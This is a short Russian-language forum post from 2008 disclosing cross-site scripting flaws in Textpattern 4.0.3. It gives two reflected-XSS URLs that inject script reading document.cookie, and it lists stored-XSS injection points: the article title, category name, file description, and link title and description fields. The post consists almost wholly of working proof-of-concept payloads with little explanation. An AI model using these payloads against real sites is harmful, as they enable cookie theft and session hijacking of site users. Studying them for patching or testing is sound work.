14.12.2008, 19:18
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
Textpattern v.4.0.3
Passive XSS
Код:
http://localhost/textpattern/index.php?event=tag&name=image&id=1&ext=</textarea><script>alert(document.cookie)</script>&alt=&h=1&w=400&type=textile
Код:
http://localhost/textpattern/index.php?event=log&step=list&page=1<script>alert(document.cookie)</script>
Active XSS
Написать новую статью => http://localhost/textpattern/index.php?event=article => в заголовок вставляем код
Код:
<script>alert()</script> или </title><script>alert()</script>
Категории => уязвимо поле "Название".
Файлы => поле "Описание".
Ссылки => поля "Заголовок" и "Описание".
(c) iddqd
Последний раз редактировалось iddqd; 15.12.2008 в 13:38..
|
|
|